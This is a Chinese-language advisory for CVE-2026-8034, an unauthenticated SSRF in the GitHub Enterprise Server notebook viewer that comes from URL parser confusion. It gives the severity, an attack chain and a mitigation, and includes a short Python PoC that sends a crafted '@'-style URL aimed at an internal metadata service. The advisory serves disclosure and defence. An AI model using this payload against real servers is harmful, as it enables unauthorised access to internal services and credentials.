CVE-2026-8034 GitHub Enterprise Server SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-8034

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GitHub Enterprise Server

漏洞概述

GitHub Enterprise Server 笔记本查看器存在严重的服务器端请求伪造 (SSRF) 漏洞。该漏洞源于验证层与 HTTP 请求库采用了不同的 URL 解析逻辑，导致解析器混淆。攻击者可构造特制的恶意 URL 绕过主机名验证，从而访问内部网络服务。此漏洞无需用户交互即可被利用，严重威胁内网安全。

技术细节

该漏洞的核心在于 URL 解析器的不一致性。GitHub Enterprise Server 的笔记本查看器在处理用户提供的 URL 时，验证层使用了一种 URL 解析器来检查主机名是否合法，而实际发起 HTTP 请求的底层库使用了另一种解析器。攻击者利用这种解析差异，构造能够通过验证但在请求时指向不同目标主机的特殊 URL（例如利用解析器对 `@` 符号、端口或特定编码处理的不同）。这使得攻击者能够将请求重定向到内部服务（如元数据服务、内部 API 等），从而获取敏感信息或进一步内网渗透。利用此漏洞仅需网络访问权限，无需身份认证。

攻击链分析

STEP 1

侦察

攻击者识别出目标使用的是存在漏洞的 GitHub Enterprise Server 版本（< 3.21）。

STEP 2

构造载荷

攻击者利用 URL 解析器差异，构造一个能通过验证层但在请求时指向内部服务的恶意 URL。

STEP 3

发送请求

攻击者向 GitHub Enterprise Server 的笔记本查看器接口发送包含恶意 URL 的请求。

STEP 4

绕过验证

服务器的验证层解析 URL 认为合法，但底层 HTTP 库将请求发送到了攻击者指定的内部地址。

STEP 5

内网探测

GitHub Server 向内部服务发起请求，攻击者利用返回的数据获取敏感信息或进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Example PoC for CVE-2026-8034
# This demonstrates the parser confusion by using a crafted URL.
# The validation layer might see "public.com" but the request library sees "internal.com".

target_url = "https://[TARGET_GHE_HOST]/notebook/view"
# Crafted payload exploiting parser confusion
# Note: The specific bypass technique depends on the libraries used (e.g., urllib vs requests).
# Common bypasses involve '@' or 'http://' ambiguities.
malicious_payload = {
    "url": "http://attacker-controlled.com@internal-metadata-service/latest/meta-data/"
}

try:
    response = requests.post(target_url, data=malicious_payload, verify=False)
    if response.status_code == 200:
        print("[+] Potential SSRF successful. Response received:")
        print(response.text[:200]) # Print part of response
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

GitHub Enterprise Server < 3.21

防御指南

临时缓解措施

如果无法立即升级，建议通过网络策略限制 GitHub Enterprise Server 的笔记本查看器组件对内部网络服务的访问，仅允许必要的外部通信，以阻断针对内网的 SSRF 攻击路径。